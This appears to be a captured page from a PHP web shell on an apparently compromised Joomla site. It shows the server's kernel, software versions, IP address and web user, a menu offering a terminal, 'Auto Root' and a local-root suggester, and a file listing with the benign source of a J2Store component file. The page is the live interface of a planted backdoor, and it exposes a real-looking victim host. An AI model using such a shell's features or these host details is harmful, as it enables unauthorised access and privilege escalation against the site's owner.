Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
components /
com_j2store /
Delete
Unzip
Name
Size
Permission
Date
Action
controllers
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
models
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
templates
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
views
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
index.html
54
B
-rwxr-xr-x
2022-02-20 10:42
j2store.php
634
B
-rwxr-xr-x
2022-02-20 10:42
router.php
17.02
KB
-rwxr-xr-x
2022-02-20 10:42
Save
Rename
<?php /** * @package J2Store * @copyright Copyright (c)2014-17 Ramesh Elamathi / J2Store.org * @license GNU GPL v3 or later */ // No direct access to this file defined ( '_JEXEC' ) or die (); // Load FOF // Include F0F if(!defined('F0F_INCLUDED')) { require_once JPATH_LIBRARIES . '/f0f/include.php'; } if(!defined('F0F_INCLUDED')) { ?> <h2>Incomplete installation detected</h2> <?php } if(!class_exists('J2StoreStrapper')){ require_once (JPATH_ADMINISTRATOR.'/components/com_j2store/helpers/strapper.php'); } J2StoreStrapper::addJS(); J2StoreStrapper::addCSS(); F0FDispatcher::getTmpInstance('com_j2store')->dispatch(); ?>